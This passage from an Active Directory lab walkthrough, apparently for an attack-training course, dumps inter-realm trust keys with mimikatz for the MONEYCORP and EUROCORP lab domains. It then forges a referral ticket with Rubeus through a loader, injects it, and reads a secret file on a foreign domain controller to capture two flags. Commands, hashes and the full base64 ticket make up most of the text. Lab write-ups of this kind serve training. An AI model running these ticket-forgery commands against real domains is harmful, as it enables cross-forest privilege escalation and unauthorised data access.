    * 5/18/2025 11:05:00 PM - CLEAR   - 75 a4 95 49 95 c5 3d 16 51 d6 dd ea 1b 5e ef a4 e1 4a a4 f6 ad de 59 dd 44 23 8d f7 26 68 e6 4e 6f 47 4c c5 88 ac 28 82 44 2d c4 3d 93 5a 81 d4 1a 59 f5 19 c4 b7 c4 02 8e e6 b7 af 93 2a b9 e3 8d 6c 69 fa bf 89 f7 1b ed 62 7c cf 58 0c 39 9c 5c 81 7d aa 5c f9 83 c8 8e 99 0f 80 db 04 be 05 59 b9 17 23 14 c2 30 69 a5 97 45 98 29 18 bf da ee 67 4b 82 80 ba 46 03 78 ce 7a 25 ea 48 cb 07 c8 8e b4 f2 75 c4 45 47 6e 74 59 5d 95 7a 46 3a a8 87 27 9a 09 4f bd 0e 21 6a 01 a7 3e 6d 30 31 fc f0 e3 00 80 27 96 e6 95 d5 8a 60 71 22 f8 d8 6e 6f f9 5c 31 50 00 ee b6 d2 2f e7 82 97 aa 14 d0 32 07 8a 38 87 66 47 f6 33 3c 34 71 8f 7c f0 8c 79 30 84 35 6c 04 cd 06 fd ed 9f 4a 10 56 6d f1 4d b9 90 45 c8 25 41 a9 7f 15 a8 ea 5b a4 42
        * aes256_hmac       1be6d20275db04c936e2280d803afaf58aca9aabe04664db9484c20206590a0a
        * aes128_hmac       ceb4bb60cc4546c039ca70454cf27321
        * rc4_hmac_nt       9e01158873ab48589848840d3b4f5ba3

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 4/18/2025 9:04:35 PM - CLEAR   - 1a 5f 93 d7 72 ef 03 2a 0f e3 9c 22 ee 65 3f c2 bb 11 51 1d d0 3c 7a fc 91 05 79 cb 2e 27 43 11 67 a8 18 e0 24 0b aa c1 71 0f e4 dc 0c b3 66 84 79 c2 74 f6 b0 88 49 19 90 ea f3 0c 02 1e 59 97 3f aa 42 a9 66 cf 9d a8 bc a4 aa 98 b4 d4 29 c3 aa a8 5e 5a ae 0f 93 21 51 6d fd ff a8 2f da cd 8c 3c fc 4c 1d 2f 51 c4 2e 89 01 20 29 2d 9d c7 40 d5 c7 1d 19 3c 38 38 94 3f 5b 67 a6 e6 68 4b 74 a2 a3 0d 44 0c dd 62 45 e7 01 46 83 0b 15 1d af 5f 0c 81 1e b8 ac eb 6f f2 79 fd 1f db af df cc 28 72 3d 50 a0 e8 50 62 57 22 64 c8 de fe 55 ef 94 b8 1f 54 76 65 7e 8c 0a a4 1b f6 45 03 1f 78 9f 1c de cf 52 c9 34 d2 c9 a1 f9 63 23 43 7a 25 f0 1d a8 b8 9d 25 44 f3 f7 c9 4d e5 2f 88 f9 1d c5 b3 62 59 bf ba e9 ea 97 f5 fb bb a1 82 a2
        * aes256_hmac       6ebf48c7d7ad99b143c9b6ad518396606a395a60dc4165e83233a1c0c5716412
        * aes128_hmac       7217c5114ba08994c10edf30106e5ce8
        * rc4_hmac_nt       5f8e757822d6f6f2977af2dc94135713

 [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 11:05:00 PM - CLEAR   - f5 ec 63 70 27 4e 2d 3b c9 cf d2 5c aa 42 3f 9e 84 43 1f ad ef 68 6f c0 0e ca 08 9f ee 7e a5 98 15 ca 17 70 e9 ee a5 02 b3 50 f5 9c fe 29 2c c1 f4 96 d3 7b f0 21 62 6b eb 3b 54 bc a3 90 99 e1 d4 1a 1a 0b 97 f1 bf d5 78 da 7e d0 cb 61 77 03 c2 08 c7 9f 9a 86 64 7b a1 0b 98 3c ba 99 bf 14 83 ff c5 f9 37 cb 1a c2 a8 1c 28 85 be 07 93 11 cb cc 35 88 5c 34 e5 d9 a1 0f ad 32 f5 e8 11 07 42 14 be 76 c3 fe 3a 77 a8 04 4c 17 ff 93 19 d0 70 ec c2 c9 0d 00 3b 2d 32 d9 d5 cc 1e f2 e0 f6 46 56 f8 cf 9c 2c 51 d8 15 f9 cd 0c d2 10 92 a8 75 af 26 8c 05 05 64 d1 be 58 03 65 3f c3 ed cd 63 05 ca 20 08 b7 09 d8 22 41 e0 a0 f7 2b 71 b7 48 ae c5 23 5b 50 d4 bf 15 a0 d4 a0 37 7d f3 d4 e3 77 93 e9 21 28 71 3d ad 9c fd 23 ce 6c 00 5d
        * aes256_hmac       8a1e8a22021baf33cf5c186b2b257cace73088402e11545ede9c112545b6c05f
        * aes128_hmac       f97130aff8d849fa56b61a80d77492b0
        * rc4_hmac_nt       e1ff686c5ac2880aaecb34a8c8db19ee


Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       0d13893ad9375052e55276afd3aa59eee6ac13ecbb34ec595551a22850e5a21f
        * aes128_hmac       1f367d7f4a602f7db49b28e8954e38b3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:10:07 PM - CLEAR   - c2 86 72 f5 a4 80 98 c4 79 c5 cd 35 31 68 fa 08 a0 b9 96 e7 e9 d4 68 c5 0a 6e 9c f8
        * aes256_hmac       677e0e1d4b663a16d24f8b8463d23e21a4ee23d2dab509221bf3444a95902fa1
        * aes128_hmac       54713b68042823a0d642e3c8b55f2bf3
        * rc4_hmac_nt       10abed140ecd1d7926fd8ed52141a4a9

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       d006160aeebee4bc4736932b02e2021e58e712bb614809a9e5d7a885c830ebf3
        * aes128_hmac       99e79607dc6c200854a32f6421f80e6c
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc

 [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:57 PM - CLEAR   - 5c 54 6e 93 5d f4 37 a8 46 c7 cf 6b 33 6e 1c 39 ed 02 2f f6 4d 28 16 02 5d ec 34 08
        * aes256_hmac       391de5a8a239c71f684355e04665f636c4b412caf5b89d7d1940e06a5a47d101
        * aes128_hmac       d39fd719f0a4e95b7b2a5c39d1c7feb2
        * rc4_hmac_nt       f3f9994ce98686f98d1dd8b81ec8f2cc


Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b0f0a55ada2dfc87111ddbdc4072a8cc8679f4a5f79242f6510c57df0a65c831
        * aes128_hmac       65770a68dff396a49468fe35cbc98cbe
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

 [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       3b0cc0612e0bed52b403f6048bc4cd86233bb75a2848aa6d24385e9b61fad2b1
        * aes128_hmac       0c32942d43e18125da040ada11ee8d5e
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57

 [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 5/16/2025 9:04:55 PM - CLEAR   - 4f 60 6b c4 51 c2 54 89 39 e3 84 f9 5e 2e 51 61 65 c6 81 64 6b 66 ff 55 41 e5 27 16
        * aes256_hmac       7a4cd11bc3ce3f83c5788e7dfe1e9bdd5c0187e2a793f9134e3bc1241497f7fb
        * aes128_hmac       aaaba3a50e251cbafda5bf205e9dd7ec
        * rc4_hmac_nt       4e8f18911392c26d05bc7044914a6d57


mimikatz(commandline) # exit
Bye!

Let's Forge a referral ticket.

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
 [  In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 5/18/2025 10:03:52 PM - CLEAR   - 85 b0 4e 5f 8d 90 05 9b b3 1e 1a 0e a6 2f 45 9b 1e bf cb 99 c9 d9 bc f5 40 74 4f 52
        * aes256_hmac       b1d7c6ebe13f4ab22d32540e056618017544c5b2b2a646c2bd46ce98b954d279
        * aes128_hmac       e0923c5d48609d5521de83fc02ec3e4b
        * rc4_hmac_nt       348f49cf83691a35ea71980994f02170

Note that we are not injecting any SID History here as it would be filtered out. Run the below command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:348f49cf83691a35ea71980994f02170 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap

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

Copy the base64 encoded ticket from above and use it in the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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

Once the ticket is injected, we can access explicitly shared resources on eurocorp-dc.

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\

Note that the only way to enumerate accessible resources (service on a machine) in eurocorp would be to request a TGS for each one and then attempt to access it.

Flag 31 [eurocorp-dc] - Service for which a TGS is requested from eurocorp-dc 🚩

Based on the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket: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

cifs is the service for which a TGS is requested from eurocorp-dc.

Flag 32 [eurocorp-dc] - Contents of secret.txt on eurocorp-dc 🚩

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt

Dollarcorp DAs can read this!

Previous19 - LO1️9️Next21 - LO2️1️

Last updated 17 days ago